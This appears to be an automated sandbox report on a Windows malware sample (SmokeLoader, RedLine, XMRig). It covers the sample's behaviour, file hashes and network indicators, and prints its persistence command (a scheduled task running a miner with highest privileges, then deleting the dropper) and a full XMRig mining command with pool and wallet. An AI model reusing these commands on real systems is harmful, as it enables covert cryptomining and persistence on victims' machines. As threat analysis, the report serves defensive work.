Malware Analysis Report

2025-06-16 03:47

Sample ID 220904-j8n1rscgdn
Target ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923
SHA256 ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923
Tags
eternity redline smokeloader xmrig installs-49 backdoor discovery infostealer miner spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923

Threat Level: Known bad

The file ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923 was found to be: Known bad.

Malicious Activity Summary

eternity redline smokeloader xmrig installs-49 backdoor discovery infostealer miner spyware stealer trojan

Eternity

SmokeLoader

xmrig

Detects Smokeloader packer

RedLine

XMRig Miner payload

Executes dropped EXE

Downloads MZ/PE file

Checks computer location settings

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Program crash

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: LoadsDriver

Suspicious behavior: MapViewOfSection

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-09-04 08:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-04 08:20

Reported

2022-09-04 08:23

Platform

win10v2004-20220812-en

Max time kernel

152s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe"

Signatures

Detects Smokeloader packer

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Eternity

eternity

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1FA8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Miner.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\1FA8.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\installs49.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3048 wrote to memory of 1748 N/A N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe
PID 3048 wrote to memory of 1748 N/A N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe
PID 3048 wrote to memory of 1748 N/A N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe
PID 1748 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\Miner.exe
PID 1748 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\Miner.exe
PID 1748 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\Miner.exe
PID 3668 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\Miner.exe C:\Windows\SysWOW64\cmd.exe
PID 3668 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\Miner.exe C:\Windows\SysWOW64\cmd.exe
PID 3668 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\Miner.exe C:\Windows\SysWOW64\cmd.exe
PID 1144 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1144 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1144 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1144 wrote to memory of 1616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1144 wrote to memory of 1616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1144 wrote to memory of 1616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1748 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\installs49.exe
PID 1748 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\installs49.exe
PID 1748 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\installs49.exe
PID 1144 wrote to memory of 428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1144 wrote to memory of 428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1144 wrote to memory of 428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1144 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
PID 1144 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
PID 1144 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
PID 4496 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe
PID 4496 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe

"C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe"

C:\Users\Admin\AppData\Local\Temp\1FA8.exe

C:\Users\Admin\AppData\Local\Temp\1FA8.exe

C:\Users\Admin\AppData\Local\Temp\Miner.exe

"C:\Users\Admin\AppData\Local\Temp\Miner.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Miner.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\installs49.exe

"C:\Users\Admin\AppData\Local\Temp\installs49.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1748 -ip 1748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1424

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

"C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"

C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe

"C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe" -a cryptonight -o pool.supportxmr.com:3333 -u 45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8.Admin_XZIOFAVD -p --max-cpu-usage=40 --donate-level=1

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

Network

Country Destination Domain Proto
US 20.42.65.85:443 tcp
US 8.8.8.8:53 azd.at udp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
NL 104.80.225.205:443 tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
US 8.8.8.8:53 220903234255747.aib.mrn16.shop udp
LV 185.82.126.147:80 220903234255747.aib.mrn16.shop tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
NL 95.101.78.106:80 tcp
NL 87.248.202.1:80 tcp
NL 87.248.202.1:80 tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
US 8.8.8.8:53 disk.yandex.ru udp
RU 87.250.250.50:443 disk.yandex.ru tcp
KR 222.236.49.124:80 azd.at tcp
US 8.8.8.8:53 inmusicbrands.com udp
US 50.57.112.151:443 inmusicbrands.com tcp
KR 222.236.49.124:80 azd.at tcp
LV 94.140.112.157:29329 tcp
US 8.8.8.8:53 rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet udp
US 198.251.83.154:80 rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pool.supportxmr.com udp
FR 141.94.96.71:3333 pool.supportxmr.com tcp

Files

memory/4988-133-0x0000000002E30000-0x0000000002E39000-memory.dmp

memory/4988-132-0x0000000002F1D000-0x0000000002F2D000-memory.dmp

memory/4988-134-0x0000000000400000-0x0000000002B92000-memory.dmp

memory/4988-135-0x0000000002F1D000-0x0000000002F2D000-memory.dmp

memory/4988-136-0x0000000002E30000-0x0000000002E39000-memory.dmp

memory/4988-137-0x0000000000400000-0x0000000002B92000-memory.dmp

memory/1748-138-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\1FA8.exe

MD5 f1ae38e744808d4df42eed53c896323a
SHA1 0d0edac38a4e1a1c073aa99fc1009230a05deb74
SHA256 9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439
SHA512 b23262fd0709c2cdf2702bab85a39ffeeebc28644e268ddecf5861bef6307b3f92c50a73b5725fa1a8578033c446bd957277224a24ed7ccd806bf3d0a77376d6

C:\Users\Admin\AppData\Local\Temp\1FA8.exe

MD5 f1ae38e744808d4df42eed53c896323a
SHA1 0d0edac38a4e1a1c073aa99fc1009230a05deb74
SHA256 9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439
SHA512 b23262fd0709c2cdf2702bab85a39ffeeebc28644e268ddecf5861bef6307b3f92c50a73b5725fa1a8578033c446bd957277224a24ed7ccd806bf3d0a77376d6

memory/1748-141-0x0000000007320000-0x00000000078C4000-memory.dmp

memory/1748-142-0x0000000002E4C000-0x0000000002E81000-memory.dmp

memory/1748-143-0x00000000047D0000-0x0000000004812000-memory.dmp

memory/1748-144-0x0000000000400000-0x0000000002BB6000-memory.dmp

memory/3668-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

C:\Users\Admin\AppData\Local\Temp\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

memory/3668-148-0x0000000000230000-0x000000000023A000-memory.dmp

memory/3668-149-0x0000000004A60000-0x0000000004AC6000-memory.dmp

memory/1144-150-0x0000000000000000-mapping.dmp

memory/980-151-0x0000000000000000-mapping.dmp

memory/1616-152-0x0000000000000000-mapping.dmp

memory/1780-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\installs49.exe

MD5 24f5400ea175ed8a981c5f4184587ac4
SHA1 24b9e12675b4e5f389eb01d6c423e123909d02d9
SHA256 3be6f25cd0a2f0c367e34e6b2d300671626dcb7ce46aeb83f3396433d8da9bc4
SHA512 4d685f9f062359b6aae187cb88c98d55c059a316bccf6fc07aed3cbb172ee55edf84aa2fd53f67d9a5301195dddf7dc68e7e10ea2ffdf7d8a13750440f0a9669

C:\Users\Admin\AppData\Local\Temp\installs49.exe

MD5 24f5400ea175ed8a981c5f4184587ac4
SHA1 24b9e12675b4e5f389eb01d6c423e123909d02d9
SHA256 3be6f25cd0a2f0c367e34e6b2d300671626dcb7ce46aeb83f3396433d8da9bc4
SHA512 4d685f9f062359b6aae187cb88c98d55c059a316bccf6fc07aed3cbb172ee55edf84aa2fd53f67d9a5301195dddf7dc68e7e10ea2ffdf7d8a13750440f0a9669

memory/1780-156-0x0000000000830000-0x000000000084C000-memory.dmp

memory/1780-157-0x00000000061A0000-0x00000000067B8000-memory.dmp

memory/1780-158-0x00000000050D0000-0x00000000050E2000-memory.dmp

memory/1780-159-0x0000000005200000-0x000000000530A000-memory.dmp

memory/1780-160-0x0000000005130000-0x000000000516C000-memory.dmp

memory/1748-161-0x0000000002E4C000-0x0000000002E81000-memory.dmp

memory/1748-162-0x0000000000400000-0x0000000002BB6000-memory.dmp

memory/1780-163-0x0000000005B80000-0x0000000005C12000-memory.dmp

memory/428-164-0x0000000000000000-mapping.dmp

memory/4496-165-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Miner.exe.log

MD5 81ab0e59097e03cb04c32378024d6628
SHA1 cc2a7a335f905e787906b6a0820acfbd4c5d0ed2
SHA256 704dd8b8fb6dfccf43fd0712e36950102151fe7232d6602c53a42af967969533
SHA512 3dd1374962c4d913ad6ec4207889abcca3e28946fa8937626bd2d13025a538e676bfc2efe76d27031d3f741bb3934104c0cf4e10da62758839add1fe543dfacb

memory/1780-169-0x0000000006120000-0x0000000006196000-memory.dmp

memory/1780-170-0x0000000006100000-0x000000000611E000-memory.dmp

memory/1780-171-0x0000000006A10000-0x0000000006BD2000-memory.dmp

memory/1780-172-0x0000000007110000-0x000000000763C000-memory.dmp

memory/1780-173-0x0000000006BE0000-0x0000000006C30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe

MD5 84cbc72865b542c646bd89bb9430e7d1
SHA1 c8320b1e24f22b36c1a283506dacdcbcf5598a4f
SHA256 323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4
SHA512 235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

memory/3848-174-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe

MD5 84cbc72865b542c646bd89bb9430e7d1
SHA1 c8320b1e24f22b36c1a283506dacdcbcf5598a4f
SHA256 323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4
SHA512 235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

memory/3848-177-0x00000270338D0000-0x00000270338F0000-memory.dmp

memory/3848-178-0x0000027033910000-0x0000027033930000-memory.dmp

memory/3848-180-0x0000027035220000-0x0000027035240000-memory.dmp

memory/3848-179-0x0000027035200000-0x0000027035220000-memory.dmp

memory/3848-182-0x0000027035220000-0x0000027035240000-memory.dmp

memory/3848-181-0x0000027035200000-0x0000027035220000-memory.dmp

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed